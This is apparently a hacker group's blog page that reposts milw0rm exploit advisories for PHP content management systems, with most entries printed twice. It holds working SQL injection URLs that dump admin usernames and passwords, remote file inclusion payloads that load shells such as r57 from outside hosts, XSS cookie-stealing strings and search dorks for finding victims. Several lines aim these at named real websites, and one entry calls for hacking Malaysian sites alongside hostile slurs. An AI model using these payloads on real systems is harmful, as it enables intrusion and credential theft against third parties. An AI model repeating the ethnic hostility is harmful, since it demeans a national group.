## Clicknet CMS v2.1 Remote File Inclusion ##
## Author : Don Tukulesto (root[at]indonesiancoder[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 14, 2009 ##
################################################################
[ Software Information ]
[+] Clicknet CMS v2.1(index.php) Remote File Inclusion
[+] Vendor : http://cms.clicknet.dk
[+} Download : http://cms.clicknet.dk/download/index.php?test=2
[+] Dork : “Powered by Clicknet CMS”
################################################################
[ ExPL0!T ]
http://127.0.0.1/index.php?_SERVER[DOCUMENT_ROOT]=[WWW.INDONESIANCODER.COM]
[ D3M0]
http://www.kimage.dk/fotografisk/?_SERVER[DOCUMENT_ROOT]=
################################################################
[ Greetings ]
[+] Indonesian Coder, SurabayaHackerLink, ServerIsDown, Mainhack Brotherhood
[+] M3NW5, BH4ND55, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, Senot, Joker, oghy, Den Awink
Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d, TUCKER, Ian Petrucii, Chercut, B4YU5154, Baim
[+] bejat Bejat, Plaque, Tuex, rey_cute, BenyCooL, D3miT_EvoLUtiOn, XNITRO, DraCoola.com
[+] Jack-, Yadoy666 + MIYA666, kecemplungkalen, xshadow, exnome, H4ck3rKu, kaMtiEz, Arianom,
[+] V3N0M, tiw0l, Pathloader and YOU !!!
[ QUOTE ]
“Ini dadaku, mana dadamu?
Kalau Malaysia mau konfrontasi ekonomi, Mari kita hadapi dengan konfrontasi ekonomi
Kalau Malaysia mau konfrontasi politik, Mari kita hadapi dengan konfrontasi politik
Kalau Malaysia mau konfrontasi militer, Mari kita hadapi dengan konfrontasi militer
Soekarno, 1963”
fvck MALAYSIA !!!
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
## Clicknet CMS v2.1 Remote File Inclusion ##
## Author : Don Tukulesto (root[at]indonesiancoder[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 14, 2009 ##
################################################################
[ Software Information ]
[+] Clicknet CMS v2.1(index.php) Remote File Inclusion
[+] Vendor : http://cms.clicknet.dk
[+} Download : http://cms.clicknet.dk/download/index.php?test=2
[+] Dork : “Powered by Clicknet CMS”
################################################################
[ ExPL0!T ]
http://127.0.0.1/index.php?_SERVER[DOCUMENT_ROOT]=[WWW.INDONESIANCODER.COM]
[ D3M0]
http://www.kimage.dk/fotografisk/?_SERVER[DOCUMENT_ROOT]=
################################################################
[ Greetings ]
[+] Indonesian Coder, SurabayaHackerLink, ServerIsDown, Mainhack Brotherhood
[+] M3NW5, BH4ND55, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, Senot, Joker, oghy, Den Awink
Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d, TUCKER, Ian Petrucii, Chercut, B4YU5154, Baim
[+] bejat Bejat, Plaque, Tuex, rey_cute, BenyCooL, D3miT_EvoLUtiOn, XNITRO, DraCoola.com
[+] Jack-, Yadoy666 + MIYA666, kecemplungkalen, xshadow, exnome, H4ck3rKu, kaMtiEz, Arianom,
[+] V3N0M, tiw0l, Pathloader and YOU !!!
[ QUOTE ]
“Ini dadaku, mana dadamu?
Kalau Malaysia mau konfrontasi ekonomi, Mari kita hadapi dengan konfrontasi ekonomi
Kalau Malaysia mau konfrontasi politik, Mari kita hadapi dengan konfrontasi politik
Kalau Malaysia mau konfrontasi militer, Mari kita hadapi dengan konfrontasi militer
Soekarno, 1963”
fvck MALAYSIA !!!
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Label:
Bugs
Wednesday, September 9, 2009
Mambo Component com_hestar Remote SQL Injection Vulnerability
## com_hestar 1.0.0 ##
## Author : M3NW5 (M3NW5[at]hackermail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 07,2009 ##
[ Software Information ]
[+] Software : com_hestar
[+] Version : 1.0.0
[+] Provider : Netvistun - netvistun@netvistun.is
[+] Web Provider : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:"com_hestar"
#####################################################
[ POC ]
http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
[ Demo ]
http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#####################################################
[ Greetings ]
[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom
[ SHOUT ]
STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!
[ Special to ]
Anggie Lestari Putri sulung dari keluarga bapak dodi dan ibu dini ^^ i lope yu pull...
# milw0rm.com [2009-09-09]
## Author : M3NW5 (M3NW5[at]hackermail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 07,2009 ##
[ Software Information ]
[+] Software : com_hestar
[+] Version : 1.0.0
[+] Provider : Netvistun - netvistun@netvistun.is
[+] Web Provider : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:"com_hestar"
#####################################################
[ POC ]
http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
[ Demo ]
http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#####################################################
[ Greetings ]
[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom
[ SHOUT ]
STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!
[ Special to ]
Anggie Lestari Putri sulung dari keluarga bapak dodi dan ibu dini ^^ i lope yu pull...
# milw0rm.com [2009-09-09]
Thursday, April 23, 2009
WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities
script:webportal-0.8-beta
-------------------------------------------------
Author: ahmadbady
email: kivi_hacker666@yahoo.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=--
download from:https://sites.google.com/site/ivanoculmine/Home/webportal-0.8-beta.zip?attredirects=0
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--===-=--=-=-=
xpl:
http://127.0.0.1/path/webportal-0.8-beta/libraries/helpdocs/help.php?lang=[local file]
http://127.0.0.1/path/webportal-0.8-beta/indexk.php?lib_path=http://site.com/shell.txt?
http://127.0.0.1/path/webportal-0.8-beta/index.php?error=[local file]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-
# milw0rm.com [2009-04-22]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
-------------------------------------------------
Author: ahmadbady
email: kivi_hacker666@yahoo.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=--
download from:https://sites.google.com/site/ivanoculmine/Home/webportal-0.8-beta.zip?attredirects=0
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--===-=--=-=-=
xpl:
http://127.0.0.1/path/webportal-0.8-beta/libraries/helpdocs/help.php?lang=[local file]
http://127.0.0.1/path/webportal-0.8-beta/indexk.php?lib_path=http://site.com/shell.txt?
http://127.0.0.1/path/webportal-0.8-beta/index.php?error=[local file]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-
# milw0rm.com [2009-04-22]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Label:
Bugs
Tuesday, March 10, 2009
CMS WEBjump! Multiple SQL Injection Vulnerabilities
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Author : M3NW5
contach : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
--== Dork ==--
Powered by Content Management System WEBjump! "portfolio_genre.php?id="
Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--
Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--
--== Dork ==--
Powered by Content Management System WEBjump! "news_id.php?lang="
Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--
Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# milw0rm.com [2009-03-10]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Author : M3NW5
contach : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
--== Dork ==--
Powered by Content Management System WEBjump! "portfolio_genre.php?id="
Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--
Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--
--== Dork ==--
Powered by Content Management System WEBjump! "news_id.php?lang="
Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--
Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# milw0rm.com [2009-03-10]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Thursday, March 5, 2009
Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
Jogjacamp JProfile Gold SQL Injection
by kecemplungkalen
Vendor : http://jogjacamp.com
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
###############################################################
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p
# milw0rm.com [2009-03-03]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
by kecemplungkalen
Vendor : http://jogjacamp.com
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
###############################################################
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p
# milw0rm.com [2009-03-03]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Wednesday, February 25, 2009
[waraxe-2004-SA#031] Multiple vulnerabilities in e107 version 0.615
www.waraxe.us
Author: Janek Vind "waraxe"
Date: 29. May 2004
Location: Estonia
Tartu Web: http://www.waraxe.us/index.php?modname=sa&id=31
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the official e107 Website - e107 is a portal / content management system powered by PHP and mySQL that gives you a totally dynamic and professional website out of the box.
It's simple wizard type install process will have you up and running in 5 minutes, and best of all it's completely free.
Homepage: http://e107.org/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, some conditions have to be met on victim server, to be vulnerable:
1. "register_globals" must be "on"
2. mysql must be version 4.x with enabled UNION functionality.
Now, let's discuss those security flaws:
A - Full Path Disclosure:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Many software developers, webmasters, admins and other IT staff are underestimating the full path disclosure as security bug.
Anyway, this information - full path to script - must be kept in secret, when possible, or it will be as little piece of the puzzle amongst many other pieces, which finally will lead to successful attack on the website.
A1 - many scripts can be accessed directly and this will provoke standard php error messages, which leads to full path disclosure.
Examples:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php
... and many-many more, needed to be fixed!
B - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Potential attacker can use xss to steal the cookies, to read cross-domain forms,etc.
Finally it can lead to admin account compromise and ovetakeing of the website.
B1 - xss in clock_menu.php through direct access of the script:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
B2 - xss in feature called "email article to a friend":
attacker must be logged off and will enter to inputfield "logged name" this: foobar'>
B3 - xss in feature called "submit news":
Attacker is logged off and will enter to inputfield "logged name" this: foobar'>
B4 - xss in "user settings":
attacker is logged on and makes POST request like this: http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]
C - Remote file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote inclusion - this is VERY DANGEROUS security hole.
If php is configured with "allow_url_fopen=on" and there is no firewall, which blocks outbound connections, then potential attacker can force VICTIM's php engine to parse ATTACKER's php code!!
This can lead to shell-level server compromise (if there are permissions to execute system commands) with "nobody" or "apache" privileges.
Attacker can then try some local r00t exploits and finally server is 0wned ;)
C1 - remote file inclusion in "secure_img_render.php"
script: http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Remark: "register_globals" must be "on" to be successful in exploitining in this way.
D - Sql injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Through sql injection potential attacker can gather from database any information he wants.
Including admin's username and password's md5 hash.
There are only 1...2 steps more to admin's account overtakeing...
D1 - critical sql injection bug #1 in "content.php" script:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
D2 - critical sql injection bug #2 in "content.php" script:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*
D3 - critical sql injection bug in "news.php" script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, i suggest to use newer version 0.616, which seems to be patched against above discussed bugs.
And of course, you are welcome to visit forum on my homepage at http://www.waraxe.us/forum/ , where you can find tutorial about manual fixes.
See ya there!
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix for helping me in bughunting!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Author: Janek Vind "waraxe"
Date: 29. May 2004
Location: Estonia
Tartu Web: http://www.waraxe.us/index.php?modname=sa&id=31
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the official e107 Website - e107 is a portal / content management system powered by PHP and mySQL that gives you a totally dynamic and professional website out of the box.
It's simple wizard type install process will have you up and running in 5 minutes, and best of all it's completely free.
Homepage: http://e107.org/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, some conditions have to be met on victim server, to be vulnerable:
1. "register_globals" must be "on"
2. mysql must be version 4.x with enabled UNION functionality.
Now, let's discuss those security flaws:
A - Full Path Disclosure:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Many software developers, webmasters, admins and other IT staff are underestimating the full path disclosure as security bug.
Anyway, this information - full path to script - must be kept in secret, when possible, or it will be as little piece of the puzzle amongst many other pieces, which finally will lead to successful attack on the website.
A1 - many scripts can be accessed directly and this will provoke standard php error messages, which leads to full path disclosure.
Examples:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php
... and many-many more, needed to be fixed!
B - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Potential attacker can use xss to steal the cookies, to read cross-domain forms,etc.
Finally it can lead to admin account compromise and ovetakeing of the website.
B1 - xss in clock_menu.php through direct access of the script:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
B2 - xss in feature called "email article to a friend":
attacker must be logged off and will enter to inputfield "logged name" this: foobar'>
B3 - xss in feature called "submit news":
Attacker is logged off and will enter to inputfield "logged name" this: foobar'>
B4 - xss in "user settings":
attacker is logged on and makes POST request like this: http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]
C - Remote file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote inclusion - this is VERY DANGEROUS security hole.
If php is configured with "allow_url_fopen=on" and there is no firewall, which blocks outbound connections, then potential attacker can force VICTIM's php engine to parse ATTACKER's php code!!
This can lead to shell-level server compromise (if there are permissions to execute system commands) with "nobody" or "apache" privileges.
Attacker can then try some local r00t exploits and finally server is 0wned ;)
C1 - remote file inclusion in "secure_img_render.php"
script: http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Remark: "register_globals" must be "on" to be successful in exploitining in this way.
D - Sql injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Through sql injection potential attacker can gather from database any information he wants.
Including admin's username and password's md5 hash.
There are only 1...2 steps more to admin's account overtakeing...
D1 - critical sql injection bug #1 in "content.php" script:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
D2 - critical sql injection bug #2 in "content.php" script:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*
D3 - critical sql injection bug in "news.php" script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, i suggest to use newer version 0.616, which seems to be patched against above discussed bugs.
And of course, you are welcome to visit forum on my homepage at http://www.waraxe.us/forum/ , where you can find tutorial about manual fixes.
See ya there!
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix for helping me in bughunting!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Monday, February 16, 2009
Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability
######################################################
#
# MAMBO Modules SWmenu 4.0 (ImageManager.php) Remote File Include Vulnerabilities
#
######################################################
#
# script : http://mamboxchange.com/frs/download.php/8109/com_swmenufree4.0.zip
#
######################################################
#
# file : /ImageManager/Classes/ImageManager.php
#
######################################################
#
# Dork : index.php?option=com_swmenupro
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell
#
######################################################
#
# require_once($mosConfig_absolute_path."/administrator/components/com_swmenupro/ImageManager/Classes/Files.php");
#
######################################################
#
# Exploit :
#
# Here one : http://www.example.com/MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
# Or : http://www.example.com/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
######################################################
---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| | Kof2002 | |OrGanza| |H@mLiT| |Snake12| |Root Shell|
|Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
|Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
| The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| | 020 | | abdulla00 " alz3eem" | | The_Viper |
All i know
#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine
# milw0rm.com [2007-03-23]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
#
# MAMBO Modules SWmenu 4.0 (ImageManager.php) Remote File Include Vulnerabilities
#
######################################################
#
# script : http://mamboxchange.com/frs/download.php/8109/com_swmenufree4.0.zip
#
######################################################
#
# file : /ImageManager/Classes/ImageManager.php
#
######################################################
#
# Dork : index.php?option=com_swmenupro
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell
#
######################################################
#
# require_once($mosConfig_absolute_path."/administrator/components/com_swmenupro/ImageManager/Classes/Files.php");
#
######################################################
#
# Exploit :
#
# Here one : http://www.example.com/MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
# Or : http://www.example.com/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
######################################################
---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| | Kof2002 | |OrGanza| |H@mLiT| |Snake12| |Root Shell|
|Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
|Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
| The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| | 020 | | abdulla00 " alz3eem" | | The_Viper |
All i know
#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine
# milw0rm.com [2007-03-23]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities
==================================================
Joomla/Mambo Component Taskhopper 1.1 (/inc/ mosConfig_absolute_path) RFI
==================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================
Homepage: www.Hack-Teach.com
==================================================
Script Site : http://taskhopper.com/One1
==================================================
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================
#Long Life Palestine
#www.Hack-Teach.com
# milw0rm.com [2007-04-10]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Joomla/Mambo Component Taskhopper 1.1 (/inc/ mosConfig_absolute_path) RFI
==================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================
Homepage: www.Hack-Teach.com
==================================================
Script Site : http://taskhopper.com/One1
==================================================
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================
#Long Life Palestine
#www.Hack-Teach.com
# milw0rm.com [2007-04-10]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Qur'an component allows you to read and listen to the Qur'an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.
Key Features:
* Displaying the Qur'an in Arabic and its translations.
* Enhanced with search function (using any keywords or by chapter number and verse number).
* Arabic recitation for both listening and downloading.
* Very user friendly.
* Using mysql database instead of file text.
Available translations at the moment:
* English
* Indonesian
You can get them all at http://www.kyantonius.com.
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--
Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--
Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz
# milw0rm.com [2008-02-15]
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Qur'an component allows you to read and listen to the Qur'an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.
Key Features:
* Displaying the Qur'an in Arabic and its translations.
* Enhanced with search function (using any keywords or by chapter number and verse number).
* Arabic recitation for both listening and downloading.
* Very user friendly.
* Using mysql database instead of file text.
Available translations at the moment:
* English
* Indonesian
You can get them all at http://www.kyantonius.com.
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:"com_quran"
